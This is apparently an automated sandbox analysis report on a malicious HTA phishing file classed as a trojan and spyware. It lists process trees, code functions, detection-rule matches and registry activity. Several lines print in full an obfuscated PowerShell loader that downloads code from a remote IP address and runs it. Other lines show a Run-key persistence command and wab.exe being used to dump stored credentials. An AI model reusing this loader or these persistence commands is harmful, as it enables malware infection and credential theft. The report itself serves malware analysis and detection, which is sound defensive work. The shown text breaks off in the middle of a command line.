              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00446D3016_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00446D8B16_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00406E8F16_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040503819_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041208C19_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004050A919_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040511A19_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0043C13A19_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004051AB19_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044930019_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0040D32219_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044A4F019_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0043A5AB19_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041363119_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044669019_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044A73019_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004398D819_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004498E019_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0044A88619_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0043DA0919_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00438D5E19_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00449ED019_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_0041FE8319_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00430F5419_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004050C222_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004014AB22_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040513322_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004051A422_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040124622_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040CA4622_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040523522_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_004032C822_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_0040168922_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00402F6022_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
              Source: amsi32_3748.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_2212.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3748, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2212, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winHTA@46/25@7/8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,16_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,22_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,16_2_00418758
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,16_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,16_2_0040B58D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Idealogical143.choJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcaoq430.eu4.ps1Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3748
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2212
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000A.00000002.3241755873.0000000023440000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 00000010.00000002.2660982925.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2661558073.0000000004651000.00000004.00000020.00020000.00000000.sdmp, chp6361.tmp.16.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaReversingLabs: Detection: 54%
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_19-33248
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teSJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk 